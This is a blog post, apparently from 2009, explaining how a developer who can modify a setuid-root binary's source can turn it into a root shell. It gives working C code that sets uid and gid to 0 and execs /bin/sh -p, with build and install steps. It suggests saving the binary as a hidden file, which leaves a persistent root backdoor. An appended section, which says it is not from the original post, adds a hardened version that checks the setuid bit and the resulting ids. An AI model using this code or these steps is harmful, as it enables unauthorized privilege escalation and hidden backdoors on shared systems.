Peeter Joot's (OLD) Blog.

Math, physics, perl, and programming obscurity.

How to get a root shell if you can modify code that runs setuid root.

Posted by peeterjoot on October 2, 2009

A tip for fellow developers in the unnamed software development project I work on.

I am often surprised that it isn't 100% general knowledge how to make yourself a root shell if you have permission to modify code that is “installed” setuid root. A setuid-root binary runs with effective uid 0 no matter who invokes it, so whoever controls its code controls root. It is as simple as executing code like the following, once you have given yourself permission to do so:

/* myRootShellCode.c */
#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>

int main(void)
{
   /* We start with effective uid 0 (the setuid bit); make the real uid
    * root as well so nothing downstream drops back to the caller. */
   setreuid(0, 0);
   setregid(0, 0); /* a convenience since some system stuff likes gid=0
                    * better than the system group. */

   putenv("PS1=# ");
   execl("/bin/sh", "sh", "-p", (char *)NULL);

   perror("execl"); /* only reached if the exec fails */
   return 1;
}

Build this, and place it in the path that your setuid-root program will be copied from:

cd /vbs/engn/XXe
cc -o XXXstart ./myRootShellCode.c  # XXXstart changed to protect the innocent

Now run your “install-script” and you have root. You'll want to save this executable for convenience (unless you are worried about it being abused;) That part goes something like:

$ XXXstart
# mv XXXstart ~/.funWithRoot
# exit

You’ll want to undo your change to XXXstart so you can debug the code of interest (possibly XXXstart itself).
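The snippet above takes two things on faith before it prints a "#" prompt: that the install step really left the binary setuid root (a copy that does not preserve the mode bits, or an install script that forgets the chmod, silently breaks it), and that setreuid()/setregid() actually took effect (a filesystem mounted nosuid leaves the bit on disk but the kernel ignores it). The following is an added example of my own, not code from the original post, that checks both before exec'ing the shell. The file name, the helper names is_setuid_root() and become_root(), and the use of argv[0] for the on-disk check are assumptions for illustration.

```c
/* checkedRootShell.c -- added example, not from the original post.
 * Same idea as myRootShellCode.c, but it verifies that the binary is
 * setuid root on disk and that we really ended up as uid/gid 0 before
 * it hands out a "#" prompt. Helper names are this example's own. */
#define _DEFAULT_SOURCE 1
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Returns 1 if path is a regular file owned by uid 0 with the setuid bit,
 * 0 if it exists but is not, -1 (errno set) if it cannot be stat()ed.
 * This is the check to run after the "install-script" step. */
int is_setuid_root(const char *path)
{
    struct stat st;
    if (stat(path, &st) != 0)
        return -1;
    return (S_ISREG(st.st_mode) && st.st_uid == 0 && (st.st_mode & S_ISUID)) ? 1 : 0;
}

/* Make real and effective uid/gid 0 and confirm it happened.
 * Returns 0 on success, -1 (errno set) otherwise. An unprivileged
 * setreuid(0, 0) fails with EPERM and leaves the ids untouched, which
 * is exactly what you get on a nosuid mount or a non-setuid copy. */
int become_root(void)
{
    if (setreuid(0, 0) != 0)
        return -1;
    if (setregid(0, 0) != 0)
        return -1;
    /* Don't trust the return values alone: look at the ids we hold now. */
    if (getuid() != 0 || geteuid() != 0 || getgid() != 0 || getegid() != 0) {
        errno = EPERM;
        return -1;
    }
    return 0;
}

int main(int argc, char **argv)
{
    (void)argc;
    /* On-disk check; argv[0] may be a bare PATH lookup, so stat() can fail. */
    int installed = is_setuid_root(argv[0]);
    if (installed == 1)
        fprintf(stderr, "%s is setuid root on disk\n", argv[0]);
    else if (installed == 0)
        fprintf(stderr, "warning: %s is not setuid root on disk (bit lost in the copy?)\n", argv[0]);
    else
        fprintf(stderr, "cannot stat %s, skipping on-disk check\n", argv[0]);

    if (become_root() != 0) {
        fprintf(stderr, "could not become root: %s (uid=%u euid=%u)\n",
                strerror(errno), (unsigned)getuid(), (unsigned)geteuid());
        return 1;   /* no misleading "#" prompt for an unprivileged shell */
    }

    putenv("PS1=# ");                       /* now the prompt is honest */
    execl("/bin/sh", "sh", "-p", (char *)NULL);
    perror("execl");                        /* only reached on failure */
    return 1;
}
```

Build it exactly like the original (cc -o XXXstart checkedRootShell.c) and drop it in the same source path. The -p flag is bash's privileged mode: it stops the shell from resetting the effective uid to the real uid when the two differ; after setreuid(0, 0) they already agree, so it only matters if you leave the setreuid out.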
